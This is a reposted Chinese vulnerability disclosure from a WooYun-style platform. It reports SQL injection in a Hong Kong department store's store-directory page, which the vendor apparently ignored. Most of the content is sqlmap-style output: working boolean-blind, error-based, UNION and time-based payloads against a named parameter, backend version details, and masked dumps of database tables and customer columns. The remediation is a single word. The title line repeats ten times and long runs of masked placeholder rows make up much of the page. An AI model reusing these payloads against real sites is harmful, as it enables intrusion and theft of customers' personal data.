神刀安全网

漏洞标题: 香港某百货公司存在SQL注射(香港地區)

漏洞详情

披露状态:

2016-04-20: 细节已通知厂商并且等待厂商处理中
2016-04-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

香港某百货公司存在SQL注射

详细说明:

香港某百货公司存在SQL注射

漏洞证明:

注入点:http://**.**.**.**/sch/store-directory/index.php?c=27407

Place: GET

Parameter: c

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: c=27407' AND 6099=6099 AND 'qedM'='qedM

Type: error-based

Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause

Payload: c=27407' AND (SELECT 2750 FROM(SELECT COUNT(*),CONCAT(0x3a696b733a,

(SELECT (CASE WHEN (2750=2750) THEN 1 ELSE 0 END)),0x3a69716b3a,FLOOR(RAND(0)*2)

)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MIsh'='MIsh

Type: UNION query

Title: MySQL UNION query (NULL) – 13 columns

Payload: c=27407' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, N

ULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a696b733a,0x47704b526f7047706162,0x

3a69716b3a), NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: c=27407' AND SLEEP(5) AND 'ONqa'='ONqa

[17:26:46] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2, PHP 5.2.17

back-end DBMS: MySQL 5.0

mask 区域
*****atabas*****
*****tion_s*****
*****cle_v*****
*****est*****
*****ntegcl*****
*****tab*****
*****-------*****
*****s *****
*****ve_grou*****
*****ign *****
*****ign_typ*****
***** *****
*****roup *****
*****ustomfi*****
*****ield *****
*****s *****
*****untry *****
***** *****
*****age *****
***** *****
*****e *****
***** *****
*****s *****
***** *****
*****module *****
*****type *****
***** *****
*****min *****
*****ver *****
*****splay *****
*****oter *****
*****ader *****
*****tcount *****
*****b *****
*****nk *****
*****g *****
*****eue *****
*****port *****
*****sult *****
*****sult_li*****
*****sult_vi*****
*****templa*****

mask 区域
*****       *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****

mask 区域
*****       *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****

mask 区域
*****       *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****

mask 区域
*****       *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ent *****
***** *****
***** *****
*****ntact *****
*****ntact_g*****
*****oup *****
*****subscri*****
*****ct *****
***** *****
*****s *****
*****on *****
***** *****
*****ct_hist*****
*****ft *****
*****em *****
*****der *****
***** *****
*****-------*****
*****ntegcl*****
*****omer_c*****
*****olu*****
*****--+-----*****
***** | Type*****
*****--+-----*****
***** | varc*****
***** | date*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | text*****
***** | varc*****
***** | varc*****
***** | int(*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | date*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | int(*****
***** | int(*****
***** | varc*****
***** | int(*****
***** | date*****
***** | text*****
***** | varc*****
*****T | text*****
***** | varc*****
***** | varc*****
*****--+-----*****
**********
*****aign_a*****
*****olu*****
*****--+-----*****
***** | Type*****
*****--+-----*****
***** | date*****
***** | varc*****
***** | long*****
***** | varc*****
***** | varc*****
***** | varc*****
***** | long*****
***** | int(*****
***** | text*****
*****E | int(*****
***** | int(*****
***** | int(*****
*****E | int(*****
***** | int(*****
***** | varc*****
***** | int(*****
*****g | varc*****
***** | varc*****
***** | varc*****
***** | int(*****
*****--+-----*****

漏洞标题:  香港某百货公司存在SQL注射(香港地區)

漏洞标题:  香港某百货公司存在SQL注射(香港地區)

漏洞标题:  香港某百货公司存在SQL注射(香港地區)

漏洞标题:  香港某百货公司存在SQL注射(香港地區)

漏洞标题:  香港某百货公司存在SQL注射(香港地區)

漏洞标题:  香港某百货公司存在SQL注射(香港地區)

漏洞标题:  香港某百货公司存在SQL注射(香港地區)

漏洞标题:  香港某百货公司存在SQL注射(香港地區)

漏洞标题:  香港某百货公司存在SQL注射(香港地區)

漏洞标题:  香港某百货公司存在SQL注射(香港地區)

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 香港某百货公司存在SQL注射(香港地區)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址